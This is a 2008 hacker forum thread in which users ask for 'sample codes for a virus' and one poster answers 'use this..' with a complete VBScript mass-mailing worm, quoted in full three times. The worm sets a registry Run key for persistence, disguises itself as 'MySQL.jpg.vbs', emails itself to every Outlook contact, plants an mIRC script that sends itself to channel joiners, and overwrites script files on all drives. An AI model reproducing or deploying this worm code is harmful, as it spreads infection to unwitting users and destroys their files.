hacker.org Forum Index
RegisterSearchFAQMemberlistUsergroupsLog in
Sample codes for a Virus
Goto page 1, 2  Next
 
Reply to topic    hacker.org Forum Index » The Hacker's Server View previous topic
View next topic
Sample codes for a Virus
Author Message
azelmj



Joined: 13 Jul 2008
Posts: 13
Location: MicroChip

Post Sample codes for a Virus Reply with quote
Hmm can anyone show me the codes for a virus..
Tue Sep 02, 2008 1:54 pm View user's profile Send private message Yahoo Messenger
PaRaDoX



Joined: 22 Aug 2008
Posts: 708
Location: In your fridge, waiting to pop out and scare you.

Post Reply with quote
now why would you want to make one of those? you clearly haven't made even the slightest attempt to learn a language.......

_________________


~You are a glitch in my reasoning.
Tue Sep 02, 2008 7:39 pm View user's profile Send private message
WhiteKnight



Joined: 15 Aug 2008
Posts: 276

Post Reply with quote
PaRaDoX wrote:
now why would you want to make one of those? you clearly haven't made even the slightest attempt to learn a language.......


I'm experienced programmer and I also wanted to know. Please and thank you.
Tue Sep 02, 2008 11:26 pm View user's profile Send private message
PaRaDoX



Joined: 22 Aug 2008
Posts: 708
Location: In your fridge, waiting to pop out and scare you.

Post Reply with quote
wait, are you asking me for code too, or just referencing my question?

_________________


~You are a glitch in my reasoning.
Wed Sep 03, 2008 1:56 am View user's profile Send private message
WhiteKnight



Joined: 15 Aug 2008
Posts: 276

Post Reply with quote
PaRaDoX wrote:
wait, are you asking me for code too, or just referencing my question?


Both.
Wed Sep 03, 2008 4:08 am View user's profile Send private message
PaRaDoX



Joined: 22 Aug 2008
Posts: 708
Location: In your fridge, waiting to pop out and scare you.

Post Reply with quote
i see, but what code are you asking for? im no pro, i just know a little bit here and there when it comes to languages (im not as "nooby" as i sound) and from your other posts, you seem to know a fair bit, so why would you ask me as opposed to a more experienced person? but, if you insist, what is it you're looking for exactly?

_________________


~You are a glitch in my reasoning.
Wed Sep 03, 2008 9:13 pm View user's profile Send private message
WhiteKnight



Joined: 15 Aug 2008
Posts: 276

Post Reply with quote
A way to copy a compiled code into another program, but another program must work just the same and another compiled code must be executed too.

It is what I'm looking for and I believe it could be related to decompiling/reverse engineering knowledge.

Please and thank you.
Wed Sep 03, 2008 10:13 pm View user's profile Send private message
PaRaDoX



Joined: 22 Aug 2008
Posts: 708
Location: In your fridge, waiting to pop out and scare you.

Post Reply with quote
hmm.....reverse engineering is a tough topic for me, and i can't really say i know much about it. but inserting compiled code into another piece of compiled code? i see.......well, the only way i can ever see that happening is to insert the code BEFORE its all compiled, since you can't monkey with compiled code. it doesn't seem possible. what are you trying to do with this?

_________________


~You are a glitch in my reasoning.
Wed Sep 03, 2008 11:27 pm View user's profile Send private message
WhiteKnight



Joined: 15 Aug 2008
Posts: 276

Post Reply with quote
I'm learning how the virus is made and do then I can handle it "personally" when I get a virus onto my computer. Wink Also it would open up my path of being a programmer, perhaps working anti-virus company.
Wed Sep 03, 2008 11:58 pm View user's profile Send private message
m!nus



Joined: 28 Jul 2007
Posts: 202
Location: Germany

Post Reply with quote
google!
keywords: code injection, code cave, CreateRemoteThread()
Thu Sep 04, 2008 1:17 am View user's profile Send private message
WhiteKnight



Joined: 15 Aug 2008
Posts: 276

Post Reply with quote
m!nus wrote:
google!
keywords: code injection, code cave, CreateRemoteThread()


Oh you're saying that I cannot inject compiled code into another compiled code, but while it is running it can be injected. I see. Thank for the hint. Wink
Thu Sep 04, 2008 2:27 am View user's profile Send private message
Crawler



Joined: 01 Sep 2008
Posts: 49

Post here we got 1! :D Reply with quote
use this..

'Vbs.Vbswg.C44 Created By Crawler. 9/4/2008
Set J3HNBQ8A = createobject("scripting.filesystemobject")
JSQNN82H = J3HNBQ8A.getspecialfolder(0)
R347C6AC = JSQNN82H & "\MySQL.jpg.vbs"
Set V58HU1JB = createobject("wscript.shell")
V58HU1JB.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate", "wscript.exe " & R347C6AC & " %"
J3HNBQ8A.copyfile wscript.scriptfullname, R347C6AC
If V58HU1JB.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\C44\P12O8TLP") <> 1 then
P8OJH241
End if
If V58HU1JB.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\C44\FU5A2187") <> 1 then
U1SR8G82 ""
End if

Function P8OJH241()
Set C8QJ75UC = CreateObject("Outlook.Application")
If C8QJ75UC = "Outlook" Then
Set J7AL43UE = C8QJ75UC.GetNameSpace("MAPI")
Set GA4DCQC6 = J7AL43UE.AddressLists
For Each G11F1G72 In GA4DCQC6
If G11F1G72.AddressEntries.Count <> 0 Then
RA15953L = G11F1G72.AddressEntries.Count
For EH754911 = 1 To RA15953L
Set HCAM30EU = C8QJ75UC.CreateItem(0)
Set I2B9A692 = G11F1G72.AddressEntries(EH754911)
HCAM30EU.To = I2B9A692.Address
HCAM30EU.Subject = "Very Important!"
HCAM30EU.Body = "Hi:" & vbcrlf & "Please view this file, it's very important." & vbcrlf & ""
execute "set F82E756U =HCAM30EU." & Chr(65) & Chr(116) & Chr(116) & Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115)
U5F5T1CI = R347C6AC
HCAM30EU.DeleteAfterSubmit = True
F82E756U.Add U5F5T1CI
If HCAM30EU.To <> "" Then
HCAM30EU.Send
End If
Next
End If
Next
End If
End function
Function U1SR8G82(D4PUN788)
If D4PUN788 <> "" Then
R32JRS7Q = V58HU1JB.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If J3HNBQ8A.fileexists("c:\mirc\mirc.ini") Then
D4PUN788 = "c:\mirc"
ElseIf J3HNBQ8A.fileexists("c:\mirc32\mirc.ini") Then
D4PUN788 = "c:\mirc32"
ElseIf J3HNBQ8A.fileexists(R32JRS7Q & "\mirc\mirc.ini") Then
D4PUN788 = R32JRS7Q & "\mirc"
ElseIf J3HNBQ8A.fileexists(R32JRS7Q & "\mirc32\mirc.ini") Then
D4PUN788 = R32JRS7Q & "\mirc"
Else
D4PUN788 = ""
End If
End If
If D4PUN788 <> "" Then
Set OEO665K0 = J3HNBQ8A.CreateTextFile(D4PUN788 & "\script.ini", True)
OEO665K0 = "[script]" & vbCrLf & "n0=on 1:JOIN:#:{"
OEO665K0 = OEO665K0 & vbCrLf & "n0=on 1:JOIN:#:{"
OEO665K0 = OEO665K0 & vbCrLf & "n1= /if ( $nick == $me ) { halt }"
OEO665K0 = OEO665K0 & vbCrLf & "n2= /." & Chr(100) & Chr(99) & Chr(99) & " send $nick "
OEO665K0 = OEO665K0 & R347C6AC
OEO665K0 = OEO665K0 & vbCrLf & "n3=}"
script.Close
End If
End Function
Function PDO4HE2C()
On Error Resume Next
Set E4D3HNBQ = J3HNBQ8A.Drives
For Each TFLD1T6R In E4D3HNBQ
BO158HU1 = TFLD1T6R & " \ "
Call JTQSQNN8(BO158HU1)
Next
End Function

Function JTQSQNN8(GH6347C6)
AN312O8T = GH6347C6
Set L028OJH2 = J3HNBQ8A.GetFolder(AN312O8T)
Set D5CU5A21 = L028OJH2.Files
For Each BJ51SR8G In D5CU5A21
If J3HNBQ8A.GetExtensionName(BJ51SR8G.path) = "vbs"
J3HNBQ8A.CopyFile wscript.scriptfullname,BJ51SR8G.path,true
End if
If J3HNBQ8A.GetExtensionName(BJ51SR8G.path) = "vbe"
J3HNBQ8A.CopyFile wscript.scriptfullname,BJ51SR8G.path,true
End if
Next
Set IAA8QJ75 = L028OJH2.Subfolders
For Each USM7AL43 In IAA8QJ75
Call (USM7AL43.path)
Next
End function

_________________
-S3TH STOLE YOUR ACCOUNT LOL
Thu Sep 04, 2008 8:29 am View user's profile Send private message
WhiteKnight



Joined: 15 Aug 2008
Posts: 276

Post Re: here we got 1! :D Reply with quote
Crawler wrote:
use this..

'Vbs.Vbswg.C44 Created By Crawler. 9/4/2008
Set J3HNBQ8A = createobject("scripting.filesystemobject")
JSQNN82H = J3HNBQ8A.getspecialfolder(0)
R347C6AC = JSQNN82H & "\MySQL.jpg.vbs"
Set V58HU1JB = createobject("wscript.shell")
V58HU1JB.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate", "wscript.exe " & R347C6AC & " %"
J3HNBQ8A.copyfile wscript.scriptfullname, R347C6AC
If V58HU1JB.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\C44\P12O8TLP") <> 1 then
P8OJH241
End if
If V58HU1JB.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\C44\FU5A2187") <> 1 then
U1SR8G82 ""
End if

Function P8OJH241()
Set C8QJ75UC = CreateObject("Outlook.Application")
If C8QJ75UC = "Outlook" Then
Set J7AL43UE = C8QJ75UC.GetNameSpace("MAPI")
Set GA4DCQC6 = J7AL43UE.AddressLists
For Each G11F1G72 In GA4DCQC6
If G11F1G72.AddressEntries.Count <> 0 Then
RA15953L = G11F1G72.AddressEntries.Count
For EH754911 = 1 To RA15953L
Set HCAM30EU = C8QJ75UC.CreateItem(0)
Set I2B9A692 = G11F1G72.AddressEntries(EH754911)
HCAM30EU.To = I2B9A692.Address
HCAM30EU.Subject = "Very Important!"
HCAM30EU.Body = "Hi:" & vbcrlf & "Please view this file, it's very important." & vbcrlf & ""
execute "set F82E756U =HCAM30EU." & Chr(65) & Chr(116) & Chr(116) & Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115)
U5F5T1CI = R347C6AC
HCAM30EU.DeleteAfterSubmit = True
F82E756U.Add U5F5T1CI
If HCAM30EU.To <> "" Then
HCAM30EU.Send
End If
Next
End If
Next
End If
End function
Function U1SR8G82(D4PUN788)
If D4PUN788 <> "" Then
R32JRS7Q = V58HU1JB.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If J3HNBQ8A.fileexists("c:\mirc\mirc.ini") Then
D4PUN788 = "c:\mirc"
ElseIf J3HNBQ8A.fileexists("c:\mirc32\mirc.ini") Then
D4PUN788 = "c:\mirc32"
ElseIf J3HNBQ8A.fileexists(R32JRS7Q & "\mirc\mirc.ini") Then
D4PUN788 = R32JRS7Q & "\mirc"
ElseIf J3HNBQ8A.fileexists(R32JRS7Q & "\mirc32\mirc.ini") Then
D4PUN788 = R32JRS7Q & "\mirc"
Else
D4PUN788 = ""
End If
End If
If D4PUN788 <> "" Then
Set OEO665K0 = J3HNBQ8A.CreateTextFile(D4PUN788 & "\script.ini", True)
OEO665K0 = "[script]" & vbCrLf & "n0=on 1:JOIN:#:{"
OEO665K0 = OEO665K0 & vbCrLf & "n0=on 1:JOIN:#:{"
OEO665K0 = OEO665K0 & vbCrLf & "n1= /if ( $nick == $me ) { halt }"
OEO665K0 = OEO665K0 & vbCrLf & "n2= /." & Chr(100) & Chr(99) & Chr(99) & " send $nick "
OEO665K0 = OEO665K0 & R347C6AC
OEO665K0 = OEO665K0 & vbCrLf & "n3=}"
script.Close
End If
End Function
Function PDO4HE2C()
On Error Resume Next
Set E4D3HNBQ = J3HNBQ8A.Drives
For Each TFLD1T6R In E4D3HNBQ
BO158HU1 = TFLD1T6R & " \ "
Call JTQSQNN8(BO158HU1)
Next
End Function

Function JTQSQNN8(GH6347C6)
AN312O8T = GH6347C6
Set L028OJH2 = J3HNBQ8A.GetFolder(AN312O8T)
Set D5CU5A21 = L028OJH2.Files
For Each BJ51SR8G In D5CU5A21
If J3HNBQ8A.GetExtensionName(BJ51SR8G.path) = "vbs"
J3HNBQ8A.CopyFile wscript.scriptfullname,BJ51SR8G.path,true
End if
If J3HNBQ8A.GetExtensionName(BJ51SR8G.path) = "vbe"
J3HNBQ8A.CopyFile wscript.scriptfullname,BJ51SR8G.path,true
End if
Next
Set IAA8QJ75 = L028OJH2.Subfolders
For Each USM7AL43 In IAA8QJ75
Call (USM7AL43.path)
Next
End function


=_= This isn't in any value to me, sorry.
Thu Sep 04, 2008 10:15 pm View user's profile Send private message
PaRaDoX



Joined: 22 Aug 2008
Posts: 708
Location: In your fridge, waiting to pop out and scare you.

Post Reply with quote
oh code injection! you could have just said something Smile

_________________


~You are a glitch in my reasoning.
Fri Sep 05, 2008 4:04 am View user's profile Send private message
Crawler



Joined: 01 Sep 2008
Posts: 49

Post Re: here we got 1! :D Reply with quote
WhiteKnight wrote:
Crawler wrote:
use this..

'Vbs.Vbswg.C44 Created By Crawler. 9/4/2008
Set J3HNBQ8A = createobject("scripting.filesystemobject")
JSQNN82H = J3HNBQ8A.getspecialfolder(0)
R347C6AC = JSQNN82H & "\MySQL.jpg.vbs"
Set V58HU1JB = createobject("wscript.shell")
V58HU1JB.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate", "wscript.exe " & R347C6AC & " %"
J3HNBQ8A.copyfile wscript.scriptfullname, R347C6AC
If V58HU1JB.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\C44\P12O8TLP") <> 1 then
P8OJH241
End if
If V58HU1JB.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\C44\FU5A2187") <> 1 then
U1SR8G82 ""
End if

Function P8OJH241()
Set C8QJ75UC = CreateObject("Outlook.Application")
If C8QJ75UC = "Outlook" Then
Set J7AL43UE = C8QJ75UC.GetNameSpace("MAPI")
Set GA4DCQC6 = J7AL43UE.AddressLists
For Each G11F1G72 In GA4DCQC6
If G11F1G72.AddressEntries.Count <> 0 Then
RA15953L = G11F1G72.AddressEntries.Count
For EH754911 = 1 To RA15953L
Set HCAM30EU = C8QJ75UC.CreateItem(0)
Set I2B9A692 = G11F1G72.AddressEntries(EH754911)
HCAM30EU.To = I2B9A692.Address
HCAM30EU.Subject = "Very Important!"
HCAM30EU.Body = "Hi:" & vbcrlf & "Please view this file, it's very important." & vbcrlf & ""
execute "set F82E756U =HCAM30EU." & Chr(65) & Chr(116) & Chr(116) & Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115)
U5F5T1CI = R347C6AC
HCAM30EU.DeleteAfterSubmit = True
F82E756U.Add U5F5T1CI
If HCAM30EU.To <> "" Then
HCAM30EU.Send
End If
Next
End If
Next
End If
End function
Function U1SR8G82(D4PUN788)
If D4PUN788 <> "" Then
R32JRS7Q = V58HU1JB.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If J3HNBQ8A.fileexists("c:\mirc\mirc.ini") Then
D4PUN788 = "c:\mirc"
ElseIf J3HNBQ8A.fileexists("c:\mirc32\mirc.ini") Then
D4PUN788 = "c:\mirc32"
ElseIf J3HNBQ8A.fileexists(R32JRS7Q & "\mirc\mirc.ini") Then
D4PUN788 = R32JRS7Q & "\mirc"
ElseIf J3HNBQ8A.fileexists(R32JRS7Q & "\mirc32\mirc.ini") Then
D4PUN788 = R32JRS7Q & "\mirc"
Else
D4PUN788 = ""
End If
End If
If D4PUN788 <> "" Then
Set OEO665K0 = J3HNBQ8A.CreateTextFile(D4PUN788 & "\script.ini", True)
OEO665K0 = "[script]" & vbCrLf & "n0=on 1:JOIN:#:{"
OEO665K0 = OEO665K0 & vbCrLf & "n0=on 1:JOIN:#:{"
OEO665K0 = OEO665K0 & vbCrLf & "n1= /if ( $nick == $me ) { halt }"
OEO665K0 = OEO665K0 & vbCrLf & "n2= /." & Chr(100) & Chr(99) & Chr(99) & " send $nick "
OEO665K0 = OEO665K0 & R347C6AC
OEO665K0 = OEO665K0 & vbCrLf & "n3=}"
script.Close
End If
End Function
Function PDO4HE2C()
On Error Resume Next
Set E4D3HNBQ = J3HNBQ8A.Drives
For Each TFLD1T6R In E4D3HNBQ
BO158HU1 = TFLD1T6R & " \ "
Call JTQSQNN8(BO158HU1)
Next
End Function

Function JTQSQNN8(GH6347C6)
AN312O8T = GH6347C6
Set L028OJH2 = J3HNBQ8A.GetFolder(AN312O8T)
Set D5CU5A21 = L028OJH2.Files
For Each BJ51SR8G In D5CU5A21
If J3HNBQ8A.GetExtensionName(BJ51SR8G.path) = "vbs"
J3HNBQ8A.CopyFile wscript.scriptfullname,BJ51SR8G.path,true
End if
If J3HNBQ8A.GetExtensionName(BJ51SR8G.path) = "vbe"
J3HNBQ8A.CopyFile wscript.scriptfullname,BJ51SR8G.path,true
End if
Next
Set IAA8QJ75 = L028OJH2.Subfolders
For Each USM7AL43 In IAA8QJ75
Call (USM7AL43.path)
Next
End function


=_= This isn't in any value to me, sorry.

huh? xD

_________________
-S3TH STOLE YOUR ACCOUNT LOL
Fri Sep 05, 2008 8:39 pm View user's profile Send private message
Display posts from previous:    
Reply to topic    hacker.org Forum Index » The Hacker's Server All times are GMT
Goto page 1, 2  Next
Page 1 of 2

 
Jump to: 
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB © 2001, 2005 phpBB Group
Design by Freestyle XL / Flowers Online.